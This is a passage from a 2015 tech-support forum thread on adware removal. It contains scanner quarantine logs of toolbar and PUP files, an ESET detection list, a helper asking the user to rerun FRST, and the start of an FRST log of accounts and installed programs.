PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lcs.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lcso.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lctn.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\ldbg.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lddg.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lff.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lffb.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lg.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lgs.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lgw.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lha.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lhp.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lia.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\liwon.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lkazulah.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lmd.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lmfc.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lmh.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lmma.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lmosh.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lmwf.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lmws.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\loryte.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lpss.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lqc.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lrb.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lrg.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lrr.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lsc.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lscr.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lsi.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lssd.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\ltrs.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\ltvf.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lvs.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lwb.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lwf.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\lzwinky.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\mgaddons.js, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\ok.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\overlay.js, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\pid.js, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\qstring.js, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\shield.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\spacer.swf, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\toolbar.js, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\yelgrey.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\yellowbg.png, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\zEnable.css, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\zEnable.htm, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\ie9mesg\COMMON\zEnable.js, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MindSpark, C:\Users\Ken Terry\AppData\LocalLow\TelevisionFanatic\bar\Settings\s_ie9mrd.dat, Quarantined, [9bc491a07d0e46f007626fad06fd8977],
PUP.Optional.MixiDJToolbar, C:\Users\Ken Terry\AppData\LocalLow\MixiDJ_V33\hk64tbMixi.dll, Quarantined, [b0afd45dcfbc181e71560715be45d927],
PUP.Optional.MixiDJToolbar, C:\Users\Ken Terry\AppData\LocalLow\MixiDJ_V33\hktbMixi.dll, Quarantined, [b0afd45dcfbc181e71560715be45d927],
PUP.Optional.MixiDJToolbar, C:\Users\Ken Terry\AppData\LocalLow\MixiDJ_V33\ldrtbMixi.dll, Quarantined, [b0afd45dcfbc181e71560715be45d927],
PUP.Optional.MixiDJToolbar, C:\Users\Ken Terry\AppData\LocalLow\MixiDJ_V33\tbMixi.dll, Quarantined, [b0afd45dcfbc181e71560715be45d927],
PUP.Optional.MixiDJToolbar, C:\Users\Ken Terry\AppData\LocalLow\MixiDJ_V33\toolbar.cfg, Quarantined, [b0afd45dcfbc181e71560715be45d927],
PUP.Optional.WhiteSmoke, C:\Users\Ken Terry\AppData\LocalLow\WhiteSmoke_New\hk64tbWhit.dll, Quarantined, [e679c36ec0cb3105ed5fcb5ff2112fd1],
PUP.Optional.WhiteSmoke, C:\Users\Ken Terry\AppData\LocalLow\WhiteSmoke_New\hktbWhit.dll, Quarantined, [e679c36ec0cb3105ed5fcb5ff2112fd1],
PUP.Optional.WhiteSmoke, C:\Users\Ken Terry\AppData\LocalLow\WhiteSmoke_New\ldrtbWhit.dll, Quarantined, [e679c36ec0cb3105ed5fcb5ff2112fd1],
PUP.Optional.WhiteSmoke, C:\Users\Ken Terry\AppData\LocalLow\WhiteSmoke_New\tbWhit.dll, Quarantined, [e679c36ec0cb3105ed5fcb5ff2112fd1],
PUP.Optional.WhiteSmoke, C:\Users\Ken Terry\AppData\LocalLow\WhiteSmoke_New\toolbar.cfg, Quarantined, [e679c36ec0cb3105ed5fcb5ff2112fd1],
PUP.Optional.SweetPacks, C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default\prefs.js, Good: (), Bad: (user_pref("sweetim.toolbar.previous.browser.newtab.url", "https://start.sweetpacks.com/?barid={51459D70-CDE8-11E2-BC12-6C626D5B38C4}&src=97&crg=3.5000006.10042&st=23");), Replaced,[2c3346ebdead9e98c9dae8c1a362b44c]

Physical Sectors: 0
(No malicious items detected)


(end)
kfoxsr is offline  
Old 09-18-2015, 03:06 PM   #10
Registered Member
 
Join Date: Sep 2015
Posts: 13
OS: windows 10



C:\AdwCleaner\Quarantine\C\Program Files\Uninstaller\Uninstall.exe.vir a variant of MSIL/DomaIQ.A potentially unwanted application
C:\AdwCleaner\Quarantine\C\Program Files (x86)\VideoConverter\Uninstall\Uninstall.exe.vir a variant of Win32/InstallCore.BA potentially unwanted application
C:\AdwCleaner\Quarantine\C\ProgramData\Conduit\IE\CT3309762\UninstallerUI.exe.vir a variant of Win32/Toolbar.Conduit.AJ potentially unwanted application
C:\AdwCleaner\Quarantine\C\ProgramData\Conduit\Multi\CT3309762\UninstallerUI.exe.vir a variant of Win32/Toolbar.Conduit.AJ potentially unwanted application
C:\AdwCleaner\Quarantine\C\ProgramData\{FA77A43D-F6ED-4924-87B5-517C061388C6}\WeatherBugSetup.res.vir a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application
C:\AdwCleaner\Quarantine\C\Users\Ken Terry\AppData\Local\NativeMessaging\CT3309762\1_0_0_4\TBMessagingHost.exe.vir a variant of Win32/Toolbar.Conduit.AH potentially unwanted application
C:\AdwCleaner\Quarantine\C\Users\Ken Terry\AppData\LocalLow\TelevisionFanaticEI\Installr\Cache\03BC49CF.exe.vir a variant of Win32/Toolbar.MyWebSearch.O potentially unwanted application
C:\AdwCleaner\Quarantine\C\Users\Ken Terry\AppData\Roaming\WebCake\dat\Desktop.OS.dll.vir a variant of MSIL/WebCake.A potentially unwanted application
C:\AdwCleaner\Quarantine\C\Users\Ken Terry\AppData\Roaming\WebCake\dat\Maintain.dat.vir a variant of MSIL/WebCake.A potentially unwanted application
C:\AdwCleaner\Quarantine\C\Users\Ken Terry\AppData\Roaming\WebCake\dat\Paladin.dat.vir a variant of MSIL/WebCake.A potentially unwanted application
C:\AdwCleaner\Quarantine\C\Users\Ken Terry\AppData\Roaming\WebCake\dat\Phoenix.dat.vir a variant of MSIL/WebCake.A potentially unwanted application
C:\AdwCleaner\Quarantine\C\WINDOWS\Sysnative\drivers\cherimoya.sys.vir a variant of Win64/NetFilter.A potentially unsafe application
C:\FRST\Quarantine\C\Users\Ken Terry\AppData\Local\Conduit\BackgroundContainer\TBUpdaterLogic_1.0.0.1.dll Win32/Toolbar.Conduit.Y potentially unwanted application
C:\FRST\Quarantine\C\Users\Ken Terry\AppData\Local\Conduit\BackgroundContainer\TBUpdaterLogic_1.0.0.2.dll Win32/Toolbar.Conduit.Y potentially unwanted application
C:\FRST\Quarantine\C\Users\Ken Terry\AppData\Local\Conduit\Chrome\CT3309762\CHUninstaller.exe a variant of Win32/Conduit.SearchProtect.N potentially unwanted application
C:\FRST\Quarantine\C\Users\Ken Terry\AppData\Local\Conduit\Chrome\CT3309762\UninstallerUI.exe a variant of Win32/Toolbar.Conduit.AJ potentially unwanted application
C:\FRST\Quarantine\C\Users\Ken Terry\AppData\Local\Conduit\CT3309762\ProtectedAutoUpdateHelper.exe Win32/Toolbar.Conduit.V potentially unwanted application
C:\Program Files\Reason\Security\Protection\rscp\uninstall.exe a variant of Win32/InstallCore.ACL potentially unwanted application
C:\Program Files\Reason\Security\Protection\rscp\bin\collector.dll a variant of Win32/InstallCore.ACL potentially unwanted application
C:\Program Files\Reason\Security\Protection\rscp\bin\icuid.dll Win32/InstallCore.ACL potentially unwanted application
C:\Program Files (x86)\NCH Software\Doxillion\doxillion.exe a variant of Win32/Bundled.Toolbar.Google.C potentially unsafe application
C:\Program Files (x86)\NCH Software\Doxillion\doxillionsetup_v2.35.exe a variant of Win32/Bundled.Toolbar.Google.C potentially unsafe application
C:\Program Files (x86)\RealArcade\Installer\GameHouse-Installer_am-mortimerbeckettcompletepremiumseries_gamehouse_.exe Win32/OpenCandy potentially unsafe application
C:\Program Files (x86)\RealArcade\Installer\bin\OCSetupHlp.dll Win32/OpenCandy potentially unsafe application
C:\Users\Ken Terry\AppData\Local\Google\Chrome\User Data\Default\Default\aagcdddgdhgbgbdjgggedadgdedcdbdb\background.js Win32/TrojanDownloader.Tracur.V trojan
C:\Users\Ken Terry\AppData\Local\Temp\rscp_setup.exe a variant of Win32/InstallCore.ACL potentially unwanted application
C:\Users\Ken Terry\AppData\LocalLow\Protected\hk64tbProt.dll Win64/Toolbar.Conduit.B potentially unwanted application
C:\Users\Ken Terry\AppData\LocalLow\Protected\hktbProt.dll Win32/Toolbar.Conduit.X potentially unwanted application
C:\Users\Ken Terry\AppData\LocalLow\Protected\ldrtbProt.dll a variant of Win32/Toolbar.Conduit.P potentially unwanted application
C:\Users\Ken Terry\AppData\LocalLow\Protected\tbProt.dll a variant of Win32/Toolbar.Conduit.X potentially unwanted application
C:\Users\Ken Terry\AppData\LocalLow\Protected\plugins\{5E1360DC-8FA8-40df-A8CD-FC3831B3634B}\3.6.12\bin\PriceGongIE.dll a variant of Win32/PriceGong.A potentially unwanted application
C:\Users\Ken Terry\Downloads\doxillionsetup.exe a variant of Win32/Bundled.Toolbar.Google.C potentially unsafe application
C:\Windows\Installer\1465fb.msi a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application
C:\Windows.old\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SkywalkerSetup[1].exe Win32/SweetIM.G potentially unwanted application
C:\Windows.old\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SkywalkerSetup[2].exe a variant of Win32/Toolbar.Perion.P potentially unwanted application
C:\Windows.old\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SkywalkerSetup[3].exe a variant of Win32/Toolbar.Perion.P potentially unwanted application
C:\Windows.old\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WSSetup[1].exe a variant of Win64/Toolbar.Perion.D potentially unwanted application
C:\Windows.old\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WSSetup[2].exe a variant of Win64/Toolbar.Perion.D potentially unwanted application
C:\Windows.old\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AskToolbarInstaller-ORJ-SPE[1].7z a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application
C:\Windows.old\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AskToolbarInstaller-ORJ-SPE[2].7z a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application
C:\Windows.old\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AskToolbarInstaller-ORJ-SPE[3].7z a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application
C:\Windows.old\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AskToolbarInstaller-ORJ-SPE[4].7z a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application
C:\Windows.old\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AskToolbarInstaller-ORJ-SPE[5].7z a variant of Win32/Bundled.Toolbar.Ask.M potentially unsafe application
kfoxsr is offline  
Old 09-18-2015, 03:23 PM   #11
Registered Member
 
Join Date: Sep 2015
Posts: 13
OS: windows 10



It appears that my problem has been fixed. My computer also seems to load webpages faster than before.

Thanks for your help!!!
kfoxsr is offline  
Old 09-18-2015, 09:53 PM   #12
Security Team
Analyst
 
Larusso's Avatar
 
Join Date: Oct 2009
Location: Wels\ Austria
Posts: 729
OS: Win7 / Win 10 TechPreview



Hy. We are not done yet so please stay with me until everything is clean.

Please re-run FRST.
Make sure that the button for the Additions.txt is checked and click the Scan Button.

Please post the FRST.txt and Additions.txt in your next reply.
__________________
regards, Daniel


There will never be peace in a war so I don't understand what they are fighting for

ASAP & UNITE Member
Larusso is offline  
Old 09-19-2015, 05:49 AM   #13
Registered Member
 
Join Date: Sep 2015
Posts: 13
OS: windows 10



Additional scan result of Farbar Recovery Scan Tool (x64) Version:15-09-2015
Ran by Ken Terry (2015-09-19 07:47:31)
Running from C:\Users\Ken Terry\Downloads
Windows 10 Home (X64) (2015-08-12 00:52:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2815594105-2774959023-4293743994-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2815594105-2774959023-4293743994-503 - Limited - Disabled)
Guest (S-1-5-21-2815594105-2774959023-4293743994-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2815594105-2774959023-4293743994-1002 - Limited - Enabled)
Ken Terry (S-1-5-21-2815594105-2774959023-4293743994-1001 - Administrator - Enabled) => C:\Users\Ken Terry

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Norton Internet Security (Enabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Internet Security (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Internet Security (Enabled) {6BFC5632-188D-B806-D13E-C607121B42A0}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.4.0.2710 - Adobe Systems Incorporated)
Adobe Dreamweaver CS5.5 (HKLM-x32\...\{0215A652-E081-4B09-9333-DC85AAB67FFA}) (Version: 11.5 - Adobe Systems Incorporated)
Adobe Dreamweaver CS6 (HKLM-x32\...\{A4ED5E53-7AA0-11E1-BF04-B2D4D4A5360E}) (Version: 12 - Adobe Systems Incorporated)
Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.12) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated)
Adobe Widget Browser (HKLM-x32\...\com.adobe.WidgetBrowser.E7BED6E5DDA59983786DD72EBFA46B1598278E07.1) (Version: 2.0 Build 230 - Adobe Systems Incorporated.)
Amazon Kindle (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Amazon Kindle) (Version: - Amazon)
Amazon Kindle (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Amazon Kindle) (Version: - Amazon)
Amazon Music (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Amazon Amazon Music) (Version: 3.10.0.928 - Amazon Services LLC)
Amazon Music (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Amazon Amazon Music) (Version: 3.10.0.928 - Amazon Services LLC)
AMD Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
AMD Catalyst Install Manager (HKLM\...\{14D58A97-B60E-A858-34D8-95469C02F7EC}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
Antique Road Trip (x32 Version: 2.2.0.97 - WildTangent) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{7FE25256-B7C1-480D-B736-10A67A833AEA}) (Version: 3.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{B255D495-4734-4E9B-B4F5-96702FD4A7B9}) (Version: 3.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5D61F006-168C-4B8B-B7FD-F113C10AE0E4}) (Version: 8.2.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI Problem Report Wizard (Version: 3.0.821.0 - ATI Technologies) Hidden
Bejeweled 2 Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Belkin USB Wireless Adaptor (HKLM-x32\...\InstallShield_{549CE1BD-88E4-4C5E-BF75-B155624714CC}) (Version: 1.0.0.10 - Belkin)
Belkin USB Wireless Adaptor (x32 Version: 1.0.0.10 - Belkin) Hidden
Big Fish Games: Game Manager (HKLM-x32\...\BFGC) (Version: 3.0.1.60 - )
Bing Bar (HKLM-x32\...\{77F8A71E-3515-4832-B8B2-2F1EDBD2E0F1}) (Version: 7.0.609.0 - Microsoft Corporation)
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
BodyMedia SYNC (HKLM-x32\...\InstallShield_{870BCBB7-1A28-4369-8327-466BD12D7E9D}) (Version: 2.0.5.90 - BodyMedia, Inc.)
BodyMedia SYNC (x32 Version: 2.0.5.90 - BodyMedia, Inc.) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
bpd_scan (x32 Version: 3.00.0000 - Hewlett-Packard) Hidden
Build-a-lot 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
CadStd (HKLM-x32\...\CadStd) (Version: 3.7.5 - Apperson & Daughters)
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
CinemaNow Media Manager (HKLM-x32\...\{6C122441-1861-4CD7-B1C5-A163A6984E12}) (Version: 1.9.1.105 - CinemaNow, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Clip Art Collection (HKLM-x32\...\{158104AB-D92E-45BC-8268-5D351C95F6AD}) (Version: 1.0.0.0 - W3i)
Command & Conquer™ 4 Tiberian Twilight (HKLM-x32\...\{82696435-8572-4D8B-A230-D1AA567D0F0F}) (Version: 1.0.0.0 - Electronic Arts)
Command & Conquer™ and The Covert Operations™ (HKLM-x32\...\{050E298D-C9B8-4582-A332-26201268A297}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Command & Conquer™ Red Alert 2 and Yuri’s Revenge (HKLM-x32\...\{F5275D1C-D133-486D-8F07-D6C571F0A8EC}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Construction-Simulator 2012 - Demo version 1.0 (HKLM-x32\...\{1AD74AE8-6BF3-4B28-A0DD-A9503C39B5BE}_is1) (Version: 1.0 - weltenbauer. Software Entwicklung GmbH)
CyberLink DVD Suite Deluxe (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.2823 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Diner Dash 2 Restaurant Rescue (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dora's Carnival Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Doxillion Document Converter (HKLM-x32\...\Doxillion) (Version: 2.35 - NCH Software)
Dropbox (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Dropbox) (Version: 3.8.8 - Dropbox, Inc.)
Dropbox (HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Dropbox) (Version: 3.8.8 - Dropbox, Inc.)
DVD Menu Pack for HP MediaSmart Video (HKLM-x32\...\InstallShield_{FB4BB287-37F9-4E27-9C4D-2D3882E08EFF}) (Version: 4.1.4030 - Hewlett-Packard)
DVD Menu Pack for HP MediaSmart Video (x32 Version: 4.1.4030 - Hewlett-Packard) Hidden
EA Download Manager (HKLM-x32\...\EADM) (Version: 7.2.0.32 - Electronic Arts, Inc.)
Escape Rosecliff Island (x32 Version: 2.2.0.95 - WildTangent) Hidden
EZ Cards Creator (HKLM-x32\...\{125110b6-fdfe-407f-a20e-a011b4f3e894}) (Version: 1.0.0 - W3i, LLC)
Facebook Messenger 2.1.4814.0 (HKLM-x32\...\{7204BDEE-1A48-4D95-A964-44A9250B439E}) (Version: 2.1.4814.0 - Facebook)
FATE (x32 Version: 2.2.0.95 - WildTangent) Hidden
Final Drive Nitro (x32 Version: 2.2.0.95 - WildTangent) Hidden
Free Editor (HKLM\...\{1BF14E04-85DE-480C-9A04-EB36744C66B4}_is1) (Version: 1.0 - Grapefruit Software, LLC)
G3 Manager (HKLM-x32\...\{5672579F-D0BD-4960-BF29-0ADCAAB77286}) (Version: 1.2.7000 - DECA System)
G3 Manager (x32 Version: 1.2.7000 - DECA System) Hidden
